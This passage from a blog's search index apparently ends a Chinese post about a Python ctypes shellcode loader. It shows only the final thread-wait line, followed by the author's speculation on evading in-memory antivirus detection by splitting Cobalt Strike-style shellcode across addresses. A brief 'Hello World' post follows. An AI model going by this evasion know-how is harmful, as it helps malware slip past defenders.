等待上面创建的线程运行完<br>ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))<br></code></pre></td></tr></table></figure><hr><p>个人所想的:<br>对于内存免杀方面,我是否可以将shellcode 放在同一个线程,n个不同的地址上面,执行的时候依次按顺序执行。shellcode 不出现合并的情况下不过好像无法从不同的地址上执行,貌似可以在线程里在申请一块内存空间,将n个地址放进去 执行。 对此是否可在忽略c2特征的情况下 实现内存的高级免杀。还是想实现不同地址的shellcode 依次执行 达到加载shellcode 的方法。理论上来看好像有点不现实。</p><p>##end</p>]]></content>
<categories>
<category> 免杀 </category>
</categories>
<tags>
<tag> python </tag>
<tag> shellcode </tag>
<tag> C2 </tag>
<tag> cobalt strike </tag>
</tags>
</entry>
<entry>
<title>Hello World</title>
<link href="/2021/11/03/hello-world/"/>
<url>/2021/11/03/hello-world/</url>
<content type="html"><![CDATA[<h1 id="Hello-World"><a href="#Hello-World" class="headerlink" title="Hello World"></a>Hello World</h1><p>每一次的 “hello world” 意味着一次开始,我知道开始,但未知结束。这是一条只有开始 没有结束的道路。不知是否有人已寻找到终点。但愿每个人都能找到自己的终点,而并非 “hello world” 的终点,将 “hello world” 画上一个句号之前,不要早已离去在这条道路上。。</p>]]></content>
<categories>
<category> 日常记录 </category>
</categories>
</entry>
</search>